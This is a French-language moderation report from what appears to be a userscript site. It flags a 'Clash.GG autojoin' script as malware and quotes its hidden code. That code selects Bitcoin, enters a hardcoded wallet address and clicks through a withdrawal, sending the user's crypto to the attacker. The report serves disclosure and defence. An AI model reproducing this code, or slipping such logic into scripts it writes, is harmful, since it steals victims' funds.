Clash.GG AUTOJOIN FREE BATTLE Script - + Text to Linka été signalé 2024-12-17 pour Malware

Le rapport dit :

Hidden code to send CRYPTO to an address

// Perform
function performSequence() {
// Click on option
setTimeout(() => clickElementByText('span', 'Bitcoin'), 300);

// 1
setTimeout(() => inputText('.css-1ljxsvl.e8bzvmc0', '3NrDGFzNxKGH4jKxrfQTDXBTKyhJy11yoL'), 600);

// checkbox
setTimeout(() => clickElement('.css-1jrx41j.e8bzvmc0'), 800);

// Click
setTimeout(() => {
const elements = document.querySelectorAll('.css-qifdi4');
if (elements.length > 1) {
elements[1].click();
}
}, 1000);

// Click on the final button
setTimeout(() => clickElement('.css-1c5xwju'), 1200);
}

Ce script a fait l'objet d' 1 rapport précédemment confirmé ou corrigé.

Fix HackBanni(l'utilisateur signalé) a effectué:

signalerCe rapport a été approuver par un modérateur.